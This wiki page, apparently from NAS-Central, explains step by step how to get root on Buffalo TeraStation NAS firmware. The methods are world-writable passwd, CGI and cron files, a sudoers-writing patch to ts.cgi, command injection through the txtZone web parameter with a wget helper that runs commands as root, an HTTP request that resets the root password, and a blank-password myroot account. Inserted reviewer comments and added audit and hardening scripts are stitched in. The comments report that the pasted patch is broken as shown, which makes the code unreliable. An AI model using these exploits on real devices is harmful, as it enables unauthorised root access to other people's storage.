Terastation Become root

From NAS-Central Buffalo - The Linkstation Wiki

As each release of the firmware fixes some bugs, new ways to become root must be discovered.


for 1.01 you could hack /usr/local/bin/mailtest.sh


for 1.03 you can log in as admin, then replace /etc/passwd.

/etc is world writable, which allows us to install a customized passwd file with a known password for root.

cd /etc
mv passwd passwd-good
cp passwd-good passwd
vi passwd
(once in vi, copy the hashed password value from the admin account into root's)
exit vi (:q)
(use whatever password you assigned to admin, now also for root)

chown root:root /etc/passwd
(if you want to keep things tidy)

su didn't seem to like an empty root password, so that's why we copy admin's. The hack described in Become_root_(2.04) may work as well, dunno, didn't see it until after I'd done the above.

- SteveK


for 1.04 you can hack /www/cgi-bin/ts.cgi

Once you have added a TeraStation serial console, you can log in as admin and start to explore the [http:/ls-lR/1.04/ file system], but you are not root yet.

There are no suid-root binaries and root comes with a password: $1$GhRqUjJ1$RPYGfyN1e4002OQ7BRkW20. You could now use a password cracker to get the cleartext password, but there must be a simpler way.

Did you already find it while browsing the [http:/ls-lR/1.04/ file system]?

No? [http:/ls-lR/1.04/_www_cgi-bin.html Look here.]

ts.cgi is the binary that generates the web interface. It's quite well written and filters all input, so hacking the TeraStation through the web interface looks too complicated as well.

But we are looking at the file on disk, and it is world writable!

This small patch:

--- ts.cgi      Mon Apr  4 14:24:03 2005
+++ ts.cgi      Fri Apr 29 10:06:49 2005
@@ -35,6 +35,13 @@
 #### QUERY_STRING�?�指定�?�るページを表示�?�る ###

 ### TOP ###
+if ($query{'page'} eq "hack") {
+    open F, ">/etc/sudoers";
+    print F "admin  ALL = (ALL) ALL\n";
+    close F;
+    chmod 0440, "/etc/sudoers";
+    $query{'page'} = "top";
 if ($query{'page'} eq "top") {
        require "./html/$lang/head.pl";
        require "./html/$lang/body.pl";
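
Review bot: the block opened by the added line if ($query{'page'} eq "hack") { is never closed before the unchanged if ($query{'page'} eq "top") { line, and the hunk header announces 13 new-side lines while only 12 are shown, so a closing "+}" line appears to have been lost when the patch was pasted; as shown, the "top" branch ends up nested inside the "hack" branch. The added open F, ">/etc/sudoers" also ignores its return value, so a failed write goes unnoticed while the request still falls through to "top"; checking the result of open would make the outcome visible.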

The patch allows you to request a "hack" page, http://myterastation.local/cgi-bin/ts.cgi?page=hack. A sudoers file will be written, and you will be redirected to the default "top" page.

Now you can use sudo to become r00t:


HD-HTGL113 login: admin
admin@HD-HTGL113:~$ id
uid=1000(admin) gid=100(hdusers) groups=100(hdusers)
admin@HD-HTGL113:~$ sudo -s

We trust you have received the usual lecture from the local System
Administrator. It usually boils down to these two things:

        #1) Respect the privacy of others.
        #2) Think before you type.

root@HD-HTGL113:~# id
uid=0(root) gid=0(root) groups=0(root)

have fun.


for 2.04 you can hack /etc/cron.d/progchk

Firmware version 2.04 fixes the modes on the /www/cgi-bin directory. Fortunately, there are two more world writable files on the filesystem which you can take advantage of.

The easiest approach will be to edit /etc/cron.d/progchk. This shell script is run every minute as root! Just add a couple of lines to make it create an /etc/sudoers file as in the 1.04 description and give it the right modes.

# progchk
# The existence of the program is checked in every minute.

echo "admin ALL = (ALL) ALL" > /etc/sudoers
chmod 440 /etc/sudoers


After a minute has passed you'll be able to use sudo to become root. You should probably remove the added lines from progchk, but they won't hurt anything where they are.
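
The 1.03, 1.04 and 2.04 methods above all depend on a file that root trusts being writable, or sitting in a directory that is writable, by an unprivileged account. The following audit for that condition is an added example, not code from the wiki or from Buffalo; the function names other_writable, weak_link and audit_files are hypothetical.

```sh
#!/bin/sh
# Added example, not from the wiki: audit for the permission mistakes this page
# relies on (world-writable /etc, ts.cgi and /etc/cron.d/progchk).
# Function names are hypothetical.

# True if "other" may write $1. Sticky directories are not counted, because
# entries owned by someone else cannot be renamed or removed inside them.
other_writable() {
    if [ -d "$1" ]; then
        [ -n "$(find -L "$1" -prune -perm -0002 ! -perm -1000 2>/dev/null)" ]
    else
        [ -n "$(find -L "$1" -prune -perm -0002 2>/dev/null)" ]
    fi
}

# Print why a non-owner could modify or replace file $1, checking the file and
# then each parent directory up to $2 (default /). Returns 1 if the chain is clean.
weak_link() {
    path=$1; stop=${2:-/}
    if other_writable "$path"; then echo "writable: $path"; return 0; fi
    dir=$(dirname "$path")
    while :; do
        if other_writable "$dir"; then echo "replaceable via: $dir"; return 0; fi
        case $dir in "$stop"|/|.) break ;; esac
        dir=$(dirname "$dir")
    done
    return 1
}

# Read file names (one per line) from stdin, e.g. everything root runs from
# cron or the web server; print one finding per weak file, return 1 if any.
audit_files() {
    boundary=$1; rc=0
    while IFS= read -r f; do
        [ -e "$f" ] || continue
        if finding=$(weak_link "$f" "$boundary"); then
            echo "$f -> $finding"; rc=1
        fi
    done
    return "$rc"
}
```

Feed audit_files every path that root executes or trusts (cron scripts, CGI programs, /etc/passwd, /etc/sudoers) with / as the boundary. Each finding is cleared by removing other-write permission from the reported path.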


for 2.14 you can still hack /www/cgi-bin/ts.cgi

During a long series of mods in which I set up opensshd and disabled telnet access, somehow I lost my ability to log in and couldn't be bothered to reflash and redo all my mods, so I had some fun and found this hack instead :-)

Most of the CGI parameters in the web interface are carefully sanity-checked. But there are still loads of system() calls with the highly dangerous single parameter version! Obviously the authors never heard of Perl's taint mode. After a bit of looking, I found that the txtZone parameter for http://terastation/ts.cgi?page=basic&mode=setup was unchecked, and ends up getting passed directly to this code:

 system("/usr/local/bin/set_timezone.sh $zone");

Oops! So it only remains to craft the right URL and we can run any commands we want on the server as root :-) I wrote a simple Perl script to help do this. Example usage:

 $ ./tera-cgi-hack.pl
 echo "telnet stream tcp nowait root /usr/sbin/tcpd in.telnetd">>/etc/inetd.conf

Log on as admin, then paste this URL into your browser, and it will run the command to enable telnet. No reflashing required :-)

You can go one step further and automate the whole process via wget, sanitizing the output with Perl:

 $ ADMIN_PASSWORD=change-me
 $ HACK_SCRIPT=./tera-cgi-hack.pl
 $ run_as_root () {
   echo "echo MAGIC_START;$*;echo MAGIC_END" | $HACK_SCRIPT > /tmp/url
   wget --http-user=admin --http-passwd=$ADMIN_PASSWORD -O- -q $(</tmp/url) | \
     perl -0777pe "s/.*MAGIC_START\n//s;s/MAGIC_END.*//s"
   }


 $ run_as_root cat /proc/cpuinfo
 cpu             : 82xx
 revision        : 16.20 (pvr 8081 1014)
 bogomips        : 173.26
 vendor          : Motorola SPS
 machine         : Sandpoint
 $ run_as_root uname -a
 Linux HD-HTGLD03 2.4.20_mvl31-ppc_terastation #1 Fri, 01 Dec 2006 10:57:27 +0900 ppc unknown

Almost as good as a real shell ;-)

--Aspiers 18:10, 1 July 2007 (CEST)


I did find what hosed my telnetd and sshd in the end - details are here.
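
The single-argument system() call quoted in the 2.14 section hands its string to /bin/sh whenever it contains shell metacharacters. The block below shows that shell-level behaviour next to a validated alternative; it is an added example, not Aspiers's script or Buffalo's code, and set_zone_string, set_zone_checked and the SET_TZ stand-in script are hypothetical. In the Perl CGI the equivalent change is the same pattern check followed by the list form of system(), which bypasses the shell.

```sh
#!/bin/sh
# Added example, not from the wiki. SET_TZ is a constructed stand-in for
# /usr/local/bin/set_timezone.sh; it is run through sh so the demo does not
# depend on the stand-in having its executable bit set.
LC_ALL=C; export LC_ALL
SET_TZ=${SET_TZ:-./set_timezone_stub.sh}

# Same shape as system("/usr/local/bin/set_timezone.sh $zone"): the value is
# pasted into a command line that a shell then parses, metacharacters included.
set_zone_string() {
    sh -c "sh $SET_TZ $1"
}

# Hardened form: accept only zone names such as Europe/Berlin or Etc/GMT+1,
# then pass the value as its own argument so no shell ever re-parses it.
set_zone_checked() {
    case $1 in
        ''|*[!A-Za-z0-9_/+-]*|/*|*/|*//*|-*)
            echo "rejected zone" >&2
            return 2 ;;
    esac
    sh "$SET_TZ" "$1"
}
```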


for 2.46 you can set the root password with an HTTP request

You can set the root password via the web interface by manipulating the http request for updating users. If you change the uid to 0 you will be able to update the root user password - see example below.

I haven't tested this 100% but this changes the password for the root account in the sqlite database (/etc/melco/nas.sqlite3) that seems to be used to create the config files. As such the change to the root password should persist across firmware updates.

Process for Firefox

  1. Log in to the TeraStation as admin
  2. Navigate to the users section
  3. Open the edit user settings window for any user (warning: you are about to change a user password)
  4. Enter a new password but do not hit OK yet
  5. Open up the dev tools and open the network tab
    • Default short cut Ctrl+Shift+Q
  6. Press OK on the user settings window
  7. Find the /nasapi/ message in the network tab where method = "User.edit" in the Params section (see example)
  8. Right click this request and select "Edit and Resend"
  9. Modify the Request Body
    • Replace the value of uid with 0
    • Replace the value of group_id with 0
    • Replace the value of sub_groups_ids with [0]
  10. Hit the send button
    • If all goes well you should get a 200 response with some json content.
  11. Create a new user (you can delete it after)
    • It didn't work for me until I did this - seems to flush the changes in /etc/melco/nas.sqlite3 to the /etc/shadow file

Example Request

Method: POST

HTTP Headers

Content-Type: application/json

Request Body

   "password":"-- REPLACE ME --",
   "sid":"-- REPLACE ME --"
 "id":"-- REPLACE ME --"


on some releases you can simply log in as root

N.B. These methods do NOT give you the root password. They let you execute commands as root without relying on telnetd or sshd being enabled. Of course, once you can do this you can run passwd or replace /etc/passwd to replace the root password with one you know. At this point you also need to enable telnetd or sshd or some other more convenient way of logging in as root.

telnet-enabled releases: try myroot

Being a newbie and all, it took me a few hours to attempt previously listed methods, all to NO GOOD USE. But I noticed the /etc/passwd file still rules in there. First of all, use your regular admin account and known password. Then vi the passwd file - opens as RO!

  NAS3 login: admin
  admin@NAS:~# vi /etc/passwd

If you see the myroot account listed there, you're all set...


Log in again with myroot and blank/NO password. Then proceed to replace the root password with your own:

  myroot@NAS:~# passwd root
  Enter new UNIX password:
  Retype new UNIX password:

You may want to change the myroot password as well - don't leave it just blank!

  myroot@NAS:~# passwd
  Enter new UNIX password:
  Retype new UNIX password:

Done! Now you're ready to start hacking your TeraStation OS.